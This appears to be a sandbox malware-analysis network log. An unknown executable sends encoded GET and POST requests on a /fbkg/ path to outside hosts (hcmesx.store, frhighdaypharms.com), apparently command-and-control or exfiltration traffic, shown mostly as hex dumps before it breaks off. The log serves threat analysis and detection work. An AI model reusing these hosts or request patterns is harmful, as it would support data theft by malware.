                                                                                                                                                                                                Nov 17, 2023 19:31:56.925539017 CET1343OUTData Raw: 7a 69 41 51 54 45 4a 4a 65 6b 69 4e 48 58 66 77 74 71 55 45 52 30 6e 41 54 2f 46 52 74 54 37 6f 67 68 79 7a 71 6f 39 58 6c 73 59 52 78 69 41 69 38 61 51 79 52 4b 43 51 5a 42 6c 33 50 76 39 41 49 50 37 6d 30 4c 7a 54 75 74 36 39 32 50 43 72 4a 58
                                                                                                                                                                                                Data Ascii: ziAQTEJJekiNHXfwtqUER0nAT/FRtT7oghyzqo9XlsYRxiAi8aQyRKCQZBl3Pv9AIP7m0LzTut692PCrJX+i+3g+830pNYJYdFJ/HfY8g7JJOtr6pGuSkDx0EW23zfg4rVTKhoP923JkbC/Qab5d8Twe8C4CVZFu3jT8VvD5Z65DHPwI3eYpr1neTYwHAOtBteJj2TsJujvtFqdvJhS4CtLzmoJ08QeJkJNKaOKM/jC1vgsJxO7
                                                                                                                                                                                                Nov 17, 2023 19:31:57.091309071 CET1345OUTData Raw: 6a 31 65 58 70 46 53 55 4a 66 69 56 70 54 77 78 5a 52 34 50 70 36 34 52 58 6e 44 39 6d 39 39 48 5a 73 56 54 32 77 54 56 52 68 4b 42 6f 72 78 2f 56 5a 34 34 31 4e 4c 4f 41 45 79 35 61 65 31 47 69 36 59 6b 53 58 37 2b 30 57 68 4e 79 6e 53 4a 33 69
                                                                                                                                                                                                Data Ascii: j1eXpFSUJfiVpTwxZR4Pp64RXnD9m99HZsVT2wTVRhKBorx/VZ441NLOAEy5ae1Gi6YkSX7+0WhNynSJ3iycP/pxmin/qvKwy5tIe0Nk/+YWtmfrbW797OyprzOYO+W3PXJYMpHZDwHClUYiJg89s56R2CcyNSswjJjMaSJjwQcfAnzmCVGzCULUWtT/ASBY07pY2Lz22zusoRT5Y1GlzJXhacPNWerMAgRnmCeIKVtKFADXjAO
                                                                                                                                                                                                Nov 17, 2023 19:31:57.091490984 CET1348OUTData Raw: 56 75 68 67 43 61 4e 46 56 6d 72 59 44 6c 76 42 34 53 2b 50 41 4b 2b 78 6b 4a 73 47 48 45 70 57 59 38 6e 48 59 51 31 6f 74 6b 4e 53 68 51 77 47 6d 76 72 6a 30 58 38 61 32 46 43 42 79 66 7a 55 47 36 52 34 49 52 43 31 73 41 41 30 44 2f 52 4a 32 67
                                                                                                                                                                                                Data Ascii: VuhgCaNFVmrYDlvB4S+PAK+xkJsGHEpWY8nHYQ1otkNShQwGmvrj0X8a2FCByfzUG6R4IRC1sAA0D/RJ2gPwOPy35H0wq8GSI7ewjs2WIwl3o8ldBBu8eS7DNYUeuk0dCgjFssvAIFLBOfkOa75sAu+nGNeZ/Oc8tsUaMy7JffMUhDuNYg7sK15JFEn+k2WrZgWTuboZDy2LeA2WrydDqdmiUtQKrR3wai4SlWwA4VCK5wOAIcd
                                                                                                                                                                                                Nov 17, 2023 19:31:57.091660976 CET1356OUTData Raw: 50 64 47 41 67 54 4e 37 61 51 51 50 46 30 7a 43 39 66 6b 58 52 68 42 71 56 6a 73 50 78 48 62 64 44 57 73 52 78 73 2b 69 71 56 37 33 69 59 73 4f 52 74 58 30 77 31 52 69 78 4d 31 64 69 34 2b 71 6f 41 38 39 41 34 44 7a 54 4a 37 4d 4b 38 59 42 32 57
                                                                                                                                                                                                Data Ascii: PdGAgTN7aQQPF0zC9fkXRhBqVjsPxHbdDWsRxs+iqV73iYsORtX0w1RixM1di4+qoA89A4DzTJ7MK8YB2WqSEuc3l14e1sfxgeu8wkuJz/QVrpI81Onp5beUS+Qt8C3l1luBdIDqE0+zYo7ABGIez50XUSyYh+8/T9crOzLUKZgUPZLfhcooFtYA97WCgUUwl+BQu7K30kB/8afDZ/nLQywTBZpoaCV3Rv0ekwQpoQfXmbpeKg2
                                                                                                                                                                                                Nov 17, 2023 19:31:57.259959936 CET1360INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:31:57 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                Data Raw: 31 62 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 52 c1 6e 13 31 10 bd f7 2b 8c 11 12 48 bb eb 4d ab 4a 68 b3 bb a8 0a 29 07 22 b5 aa c2 a1 27 e4 d8 26 eb 76 6d af ec 49 d2 50 55 e2 c2 5f 70 ab 8a b8 f4 ce a5 3f 53 51 c4 67 60 af 43 8b 2a f0 c5 7e 33 e3 f7 9e c7 53 3e 79 7d 30 9a 1e 1f 8e 51 03 aa ad b7 ca 3f 9b a0 dc 23 c7 ac ec 00 b1 86 5a 27 a0 c2 ef a6 fb e9 4b 8c 24 af f0 64 ef fd e8 60 32 19 8f a6 18 39 cb 2a 4c 88 e3 a7 d9 ee 20 6b 29 39 71 a9 07 69 67 4d a6 a4 ce 4e 1c ae 4b 12 c9 ee 59 eb c9 5e 26 b5 84 e7 e7 92 17 f8 ed 78 be 86 23 da 6e 2f f6 cd 0e 6c bf c1 09 3b fd 47 f4 e2 c5 03 0f 2a 95 00 fa d8 5c bd 85 fc 8a a9 e0 73 29 c5 aa 33 16 30 d2 54 89 bf 31 33 1a 84 f6 af 5a 49 0e 4d c5 c5 52 32 91 f6 20 f1 ae a5 5a a8 d4 31 da 8a 6a 90 e5 89 a2 67 8f 22 0b 27 6c 5f 40 67 be 46 1b ec a5 a3 38 48 68 45 fd f3 fa f2 ee cb b7 5f 37 37 77 9f af 7e 7c bf be fd f4 b5 24 31 13 ab 1c ac 7d 55 7f 0e 2b 74 3e 99 19 be 4e e4 07 eb ad 9e f7 4e 0a 34 c8 f3 67 c3 46 c8 79 03 1b d0 51 ce a5 9e 17 28 1f 2a 6a e7 52 fb d3 c5 3d cf d3 95 a5 dd ff 2f 3f 14 6e 64 66 c6 72 61 0b a4 8d 16 c3 98 f5 3d 8e de 4a d2 c4 41 08 be fc cf 71 b9 ec 3f 3f 48 84 e7 86 4e 47 9a 38 03 0d 40 e7 0a 42 f8 d9 5a c1 c7 7c 27 63 8c b0 8e e5 bb e4 95 9f 21 ad 45 3b 32 5c 54 7d 28 8c 44 bc eb 89 89 67 0e db 46 87 f4 63 f8 1b 64 53 ca f5 9d 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 1b7uRn1+HMJh)"'&vmIPU_p?SQg`C*~3S>y}0Q?#Z'K$d`29*L k)9qigMNKY^&x#n/l;G*\s)30T13ZIMR2 Z1jg"'l_@gF8HhE_77w~|$1}U+t>NN4gFyQ(*jR=/?ndfra=JAq??HNG8@BZ|'c!E;2\T}(DgFcdS0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                67192.168.11.205019438.59.48.8680C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:31:59.440315008 CET1360OUTGET /fbkg/?T6I=JuP+2JK8vI5+yQGAW5l1o2dXq+3Ksd0y6wg1KdtNGd9Gu0TSnfkwjHMHJqFqjZu7ChSweGH6mw1hhK/OtJKBpxcTcfvHXyAOQQ==&Nx1L1=526dgl_phJ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.hcmesx.store
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:31:59.607578039 CET1361INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:32:00 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Data Raw: 32 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 31 2e 6c 61 2f 6a 73 2d 73 64 6b 2d 70 72 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 4c 41 2e 69 6e 69 74 28 7b 69 64 3a 22 4b 45 67 79 74 52 61 6c 32 75 46 6f 33 74 32 47 22 2c 63 6b 3a 22 4b 45 67 79 74 52 61 6c 32 75 46 6f 33 74 32 47 22 7d 29 3c 2f 73 63 72 69 70 74 3e 0a 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 0a 20 20 20 20 3c 74 69 74 6c 65 3e e6 ad a3 e5 9c a8 e8 bd bd e5 85 a5 e4 b8 ad e2 80 a6 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 69 66 72 61 6d 65 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 68 65 69 67 68 74 3a 20 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 20 30 3b 6d 61 72 67 69 6e 3a 20 30 7d 0a 20 20 20 20 20 20 20 20 23 77 72 61 70 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 68 65 69 67 68 74 3a 20 31 30 30 25 3b 7d 0a 20 20 20 20 20 20 20 20 69 66 72 61 6d 65 7b 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 78 79 6d 74 7a 30 33 2e 63 63 2f 63 70 63 30 35 2f 3f 63 68 61 6e 6e 65 6c 43 6f 64 65 3d 63 70 63 30 35 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 29d<!DOCTYPE html><html><head><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"KEgytRal2uFo3t2G",ck:"KEgytRal2uFo3t2G"})</script> <meta charset="UTF-8"> <meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"> <title></title> <style> html,body,iframe{width: 100%;height: 100%;padding: 0;margin: 0} #wrap{width: 100%;height: 100%;} iframe{border: none;} </style></head><body><div id="wrap"> <iframe src="https://dxymtz03.cc/cpc05/?channelCode=cpc05"></iframe></div></body></html>0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                6738.59.48.8680192.168.11.2050194C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:31:59.440315008 CET1360OUTGET /fbkg/?T6I=JuP+2JK8vI5+yQGAW5l1o2dXq+3Ksd0y6wg1KdtNGd9Gu0TSnfkwjHMHJqFqjZu7ChSweGH6mw1hhK/OtJKBpxcTcfvHXyAOQQ==&Nx1L1=526dgl_phJ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.hcmesx.store
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:31:59.607578039 CET1361INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:32:00 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Data Raw: 32 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 31 2e 6c 61 2f 6a 73 2d 73 64 6b 2d 70 72 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 4c 41 2e 69 6e 69 74 28 7b 69 64 3a 22 4b 45 67 79 74 52 61 6c 32 75 46 6f 33 74 32 47 22 2c 63 6b 3a 22 4b 45 67 79 74 52 61 6c 32 75 46 6f 33 74 32 47 22 7d 29 3c 2f 73 63 72 69 70 74 3e 0a 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 0a 20 20 20 20 3c 74 69 74 6c 65 3e e6 ad a3 e5 9c a8 e8 bd bd e5 85 a5 e4 b8 ad e2 80 a6 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 69 66 72 61 6d 65 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 68 65 69 67 68 74 3a 20 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 20 30 3b 6d 61 72 67 69 6e 3a 20 30 7d 0a 20 20 20 20 20 20 20 20 23 77 72 61 70 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 68 65 69 67 68 74 3a 20 31 30 30 25 3b 7d 0a 20 20 20 20 20 20 20 20 69 66 72 61 6d 65 7b 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 78 79 6d 74 7a 30 33 2e 63 63 2f 63 70 63 30 35 2f 3f 63 68 61 6e 6e 65 6c 43 6f 64 65 3d 63 70 63 30 35 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 29d<!DOCTYPE html><html><head><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"KEgytRal2uFo3t2G",ck:"KEgytRal2uFo3t2G"})</script> <meta charset="UTF-8"> <meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"> <title></title> <style> html,body,iframe{width: 100%;height: 100%;padding: 0;margin: 0} #wrap{width: 100%;height: 100%;} iframe{border: none;} </style></head><body><div id="wrap"> <iframe src="https://dxymtz03.cc/cpc05/?channelCode=cpc05"></iframe></div></body></html>0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                68209.182.252.24580192.168.11.2050195C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:32:04.787533998 CET1362OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.frhighdaypharms.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.frhighdaypharms.com
                                                                                                                                                                                                Referer: http://www.frhighdaypharms.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 70 59 68 53 69 2b 6d 53 4a 31 49 7a 4e 4b 31 77 6e 42 33 75 6b 38 2b 2f 4a 2f 36 4a 6f 63 69 42 6a 6a 6b 6b 30 69 52 6c 32 46 79 6f 4b 41 62 6f 5a 6a 2f 34 6f 75 4b 74 51 65 78 48 39 46 39 4f 55 6d 6f 6b 47 72 5a 64 77 59 65 55 5a 4a 36 5a 39 57 45 6e 31 34 68 4b 50 67 74 42 49 79 36 35 39 38 46 46 37 2f 6a 50 6e 6f 42 38 44 51 78 42 48 6c 64 58 72 59 6c 37 6f 32 75 62 39 44 49 62 37 42 6a 50 33 35 4c 6b 50 58 4f 6a 72 53 6a 33 46 66 33 4e 6a 6c 5a 76 57 56 38 6d 51 57 53 7a 4f 2b 70 42 76 50 36 61 4f 55 36 43 37 30 33 2f 46 77 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=pYhSi+mSJ1IzNK1wnB3uk8+/J/6JociBjjkk0iRl2FyoKAboZj/4ouKtQexH9F9OUmokGrZdwYeUZJ6Z9WEn14hKPgtBIy6598FF7/jPnoB8DQxBHldXrYl7o2ub9DIb7BjP35LkPXOjrSj3Ff3NjlZvWV8mQWSzO+pBvP6aOU6C703/Fw==
                                                                                                                                                                                                Nov 17, 2023 19:32:04.959074020 CET1363INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:32:04 GMT
                                                                                                                                                                                                Server: Apache/2.4.57 (codeit) OpenSSL/3.0.10+quic mod_perl/2.0.11 Perl/v5.16.3
                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                68192.168.11.2050195209.182.252.24580C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:32:04.787533998 CET1362OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.frhighdaypharms.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.frhighdaypharms.com
                                                                                                                                                                                                Referer: http://www.frhighdaypharms.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 70 59 68 53 69 2b 6d 53 4a 31 49 7a 4e 4b 31 77 6e 42 33 75 6b 38 2b 2f 4a 2f 36 4a 6f 63 69 42 6a 6a 6b 6b 30 69 52 6c 32 46 79 6f 4b 41 62 6f 5a 6a 2f 34 6f 75 4b 74 51 65 78 48 39 46 39 4f 55 6d 6f 6b 47 72 5a 64 77 59 65 55 5a 4a 36 5a 39 57 45 6e 31 34 68 4b 50 67 74 42 49 79 36 35 39 38 46 46 37 2f 6a 50 6e 6f 42 38 44 51 78 42 48 6c 64 58 72 59 6c 37 6f 32 75 62 39 44 49 62 37 42 6a 50 33 35 4c 6b 50 58 4f 6a 72 53 6a 33 46 66 33 4e 6a 6c 5a 76 57 56 38 6d 51 57 53 7a 4f 2b 70 42 76 50 36 61 4f 55 36 43 37 30 33 2f 46 77 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=pYhSi+mSJ1IzNK1wnB3uk8+/J/6JociBjjkk0iRl2FyoKAboZj/4ouKtQexH9F9OUmokGrZdwYeUZJ6Z9WEn14hKPgtBIy6598FF7/jPnoB8DQxBHldXrYl7o2ub9DIb7BjP35LkPXOjrSj3Ff3NjlZvWV8mQWSzO+pBvP6aOU6C703/Fw==
                                                                                                                                                                                                Nov 17, 2023 19:32:04.959074020 CET1363INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:32:04 GMT
                                                                                                                                                                                                Server: Apache/2.4.57 (codeit) OpenSSL/3.0.10+quic mod_perl/2.0.11 Perl/v5.16.3
                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                69209.182.252.24580192.168.11.2050196C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:32:07.473860025 CET1365OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.frhighdaypharms.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.frhighdaypharms.com
                                                                                                                                                                                                Referer: http://www.frhighdaypharms.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
